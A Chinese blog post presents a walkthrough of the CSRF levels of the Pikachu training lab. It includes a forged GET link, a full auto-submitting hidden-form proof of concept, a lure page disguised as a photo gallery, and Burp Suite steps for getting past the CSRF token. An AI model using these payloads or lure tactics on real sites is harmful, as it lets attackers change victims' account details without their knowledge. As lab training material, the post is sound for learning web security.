pikache靶场通关——CSRF攻击

已于 2023-07-01 22:58:52 修改
阅读量1.2k 收藏 25
点赞数 2
分类专栏: web安全 渗透模拟练手 文章标签: csrf 前端
于 2023-07-01 22:07:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p36273/article/details/131494966
版权

文章目录

前言

在这里插入图片描述
靶场一共又三关,现在我们就来通关吧。

使用工具

Burp Suite Professional抓包工具

第一关(host:192.168.1.107)、CSRF(get) login

Step.1、以受害者身份登录账号

我这里选择了vince的身份登录
在这里插入图片描述
在这里插入图片描述

Step.2、以受害者身份点击修改个人信息的按钮

在这里插入图片描述
在这里插入图片描述
发现修改成功,URL也没有显示什么信息。

Step.3、以黑客身份使用burp进行抓包(查看对面修改格式)

对提交修改信息时候进行抓包
在这里插入图片描述

看到上面就是提交的get请求数据
从上面的url可见,修改用户信息的时候,是不带任何不可预测的认证信息的。那么,这里应该是可以被利用的。

把修改的get链接复制下来
http://192.168.1.107/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&phonenum=12345678900&add=%E6%9C%88%E7%90%83&email=hhhhh%40pikachu.com&submit=submit HTTP/1.1

然后就把包释放掉。

Step4、以黑客身份生成一个恶意网页给用户来点击

在这里插入图片描述
这里就修改了电话和邮箱2处

生成恶意网页让受害者点击
在这里插入图片描述

Step5、以受害者身份点击了恶意网站的链接

!注意:这里必须让受害者使用同一个浏览器,并且登录状态还在生效才有用

在这里插入图片描述
很明显手机号码和邮箱被修改了。第一关通关

第二关(host:192.168.1.108)、CSRF(post) login

在这里插入图片描述
继续选择登录vince的账号。
在这里插入图片描述

Step1、以受害者身份点击修改个人信息的按钮

在这里插入图片描述

Step2、以黑客身份使用burp进行抓包

在这里插入图片描述
观察报文,这里学上一关一样没有特殊的信息,可以被利用。

由于这一关是post提交了,无法学上一关那样直接使用URL来改参数。但抓包可知,这个表单的数据数量以及对应的字段名name,这就可以构造一个恶意表单网页来给用户点击。

Step3、以黑客身份生成一个恶意网页给用户来点击

在这里插入图片描述
在这里插入图片描述
献上代码:

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title></title>
</head>
<body>
	<form action="http://192.168.1.108/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
		<input type="hidden" name="sex" value="非人类">
		<input type="hidden" name="phonenum" value="10000000001">
		<input type="hidden" name="add" value="太空">
		<input type="hidden" name="email" value="myWord@pikachu.com">
		<input type="hidden" name="submit" value="submit" />
		<input type="submit" id="submit" value="Submit request" style="display: none;">
	</form>
</body>
<script type="text/javascript">
	window.onload = function(){
		document.getElementById("submit").click();
	}
</script>
</html>

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>美女写真</title>
</head>
<body>
<a href="./girl.php"><img src="https://up.enterdesk.com/edpic_source/56/ea/02/56ea02b3aa4d582ef244974b1d7c95ec.jpg" style="width: 200px;height: auto;" alt=""></a>
</body>
</html>

诱导客户点击恶意链接
在这里插入图片描述

Step4、以受害者身份点击了恶意网站的链接

!注意:这里必须让受害者使用同一个浏览器,并且登录状态还在生效才有用
在这里插入图片描述
可以看到信息已经被修改了,第二关通关

第三关(host:192.168.1.112)、CSRF Token login

在这里插入图片描述
继续选择vince的账号登录。
在这里插入图片描述

Step1、以受害者身份点击修改个人信息的按钮

在这里插入图片描述

Step2、以黑客身份使用burp进行抓包

在这里插入图片描述
观察一下报文,很明显多了一个token,关于token的解释,在前面暴力破解那一关已经有解析过,这里就不作过多的解释了。

Step3、以黑客身份尝试对token进行绕过

将请求包发送到Intruder模块,设置positions
在这里插入图片描述

攻击模式设置为Pitchfork,这里只把电话号码和token设置为了变量
在这里插入图片描述

设置电话号码的payload,这里就不使用字典了,直接随便指定一个号码段
在这里插入图片描述

下面这一步是关键,主要为了获取“上一次响应数据包”中的token值,在响应包中找到token值,规则添加成功
在这里插入图片描述

把token值选中,并且复制下来,然后点OK。
在这里插入图片描述

因为要重定向响应,这里设置为总是跟随重定向,选择always
在这里插入图片描述

返回设置Payload2,选择Recursive grep,刚才抓取的代码就自动过来了,把初始值填在下面,打个勾就行了。
在这里插入图片描述

因为需要提交token,所以不能使用多线程,需要把线程数改为1,使用单线程。
在这里插入图片描述

Step4、以黑客身份攻击

点击Start attack开始攻击。
在这里插入图片描述

返回网页查看攻击成果
在这里插入图片描述
这里可以看到手机变成上面最后一次攻击的值了。第三关通关

第三关(方法2,使用插件)、CSRF Token login

继续选择vince的账号登录。
在这里插入图片描述

Step1、安装和配置csrf插件

选择bp的 Extender 扩展模块,点击 BApp Store,找到 CSRF Token Tracker,点击 Install 进行安装
在这里插入图片描述

选中新安装的这个模块,配置请求地址和请求参数
在这里插入图片描述

Step2、以黑客身份进行抓包

在这里插入图片描述

Step3、以黑客身份配置攻击设置

把数据包发送到重发模块
在这里插入图片描述

就修改一下电话号码值
在这里插入图片描述

点击Send发送数据包
在这里插入图片描述

再点击上面的Follow redirection按钮,页面刷新如下
在这里插入图片描述
这里就可以看到手机号码改变了。

Step4、查看结果

返回查看插件
在这里插入图片描述

释放包,浏览器查看页面
在这里插入图片描述
发现电话号码已经被修改了,通关

p36273
关注
  • 2
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
Pikachu漏洞靶场系列之CSRF
weixin_45868644的博客
09-11 1392
文章目录概述CSRF攻击需要条件CSRF和XSS的区别检测是否存在CSRF漏洞一、CSRF(get)二、CSRF(post)CSRF(token)防护措施 概述 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了、所以CSRF攻击也被称为“one click”攻击CSRF攻击需要条件 1、目标网站没有对修改个人信息修改的请
pikachu 靶场通关(全)
最新发布
m0_59598029的博客
04-10 1061
发现同一个验证码我们重复使用了多次,返回的结果时用户名或密码错误,并没有提示验证码失效,也就是只要我们这个页面不刷新,就可以一直用这个验证码,那就跟第一关一样,直接ctrl+i拿去爆破,得到了跟上面一样的用户名跟密码。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显,经过查找发现是在密码输入框的下方多一个隐藏的输入框,记录的是token的信息,那么直接拿去burp上开始爆破!
pikachu靶场通关(部分)
qq_45212316的博客
01-16 1176
文件包含漏洞,例如php,include(),开发过程中为了方便,把常用的函数写到了其它单独的文件中,然后引入这个文件,利用里面的函数,但是有的程序可能是会在你传参的时候选择某个文件,如果对这个参数不过滤,那么就会导致文件包含漏洞的产生。点击之后页面跳转至个人信息页面,并且手机号已经发生了改变,正常情况下这个CSRF Poc的页面是攻击者生成的,然后发送给受害者进行点击,然后攻击者就可以使用受害者的合法的身份去访问网站(比如修改密码、修改个人信息等)。文件,直接将URL中的filename的值修改。
Pikachu(皮卡丘)靶场---CSRF
m0_74850066的博客
06-04 327
你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 953
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
Pikachu靶场全级别通关教程详解
热门推荐
weixin_52385170的博客
12-02 3万+
Pikachu靶场通关教程,超详细,欢迎评论区留言,一起进步
pikachu靶场通关技巧详解
henghengzhao_的博客
10-13 6843
pikachu靶场全部漏洞详解,不懂可以留言,作者会及时回复
pikachu靶场-->CSRF漏洞详解
unlash的博客
10-13 260
pikachu靶场CSRF漏洞详解,通关教程,漏洞介绍,防御措施,漏洞检测,漏洞危害
Burpsuite 插件的学习与使用
Goodric的博客
07-21 1677
burp 可以使用三种语言编写的扩展插件,Java、python 和 ruby 。 除Java外,其它两种语言需要的扩展插件需要专门的配置运行环境。即 Location of Jython(Ruby) standalone JAR file: 这个选项需要下载的环境路径。...
[PiKaChu靶场通关]CSRF
网络安全知识分享
10-12 3896
[PiKaChu靶场通关]CSRF一、介绍二、攻击细节三、防御措施检查Referer字段添加校验token四、靶场内容CSRF(GET) 一、介绍 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网
pikachu通关教程(CSRF
Bu2n的博客
12-08 1272
CSRF(get)CSRF(post)CSRF Token CSRF(get) 登录vince的账号 修改手机号 抓包看到是个get请求 打开一个新网页,利用上面的参数,构造一个url,这里我把手机号改为120(这里是模拟钓鱼网站跳转到恶意的url) 手机号修改成功 CSRF(post) 登录vince账号,尝试修改信息,抓包,发现是post请求 这下就不能直接用url跳转进行CSRF攻击了,得伪造一个表单页面,让用户去访问。 表单代码如下 js代码意思是当页面加载完毕,自动点击提交按钮,.
Pikachu靶场通关秘籍(持续更新)
liu914589417的博客
10-17 4217
Pikachu靶场通关秘籍(持续更新)
Pikachu靶场CSRF漏洞详解
m0_46467017的博客
05-16 6979
Pikachu靶场之XSS漏洞详解前言漏洞简述CSRF是什么CSRF攻击原理CSRF攻击防护如何确认一个web系统存在CSRF漏洞第1关 CSRF(get)第2关 CSRF(post)第三关 CSRF Tokentoken验证原理其他防范措施 前言 本篇文章用于巩固对自己csrf漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列) 链接: Pikachu漏洞靶场系列之CSRF 漏洞简述 CSRF是什么 CSRF全称为跨站请求伪造(Cro
CSRF靶场总结
qq_51582652的博客
03-22 706
CSRF总结CSRF概述CSRF漏洞挖掘基于GET方式 的CSRFXSS攻击方式文件攻击方式基于POST方式的CSRFXSS攻击方式 CSRF概述 csrf跨站请求伪造就是伪造链接,诱导用户点击修改用户的资料,密码等内容。执行非本意的操作。Csrf侧重的是修改用户的数据,而不是盗取数据。 CSRF漏洞挖掘 当页面只有Referer请求而没有token的时候,删掉Referer还能正常请求。说明存在CSRF漏洞。 可以直接构造请求伪造去碰。 基于GET方式 的CSRF XSS攻击方式 首先先指定服务器ip
pikachu靶场-CSRF(跨站请求伪造)
qq_44655084的博客
12-30 1041
Cross-site request forgery 简称为“CSRF”,在CSRF攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值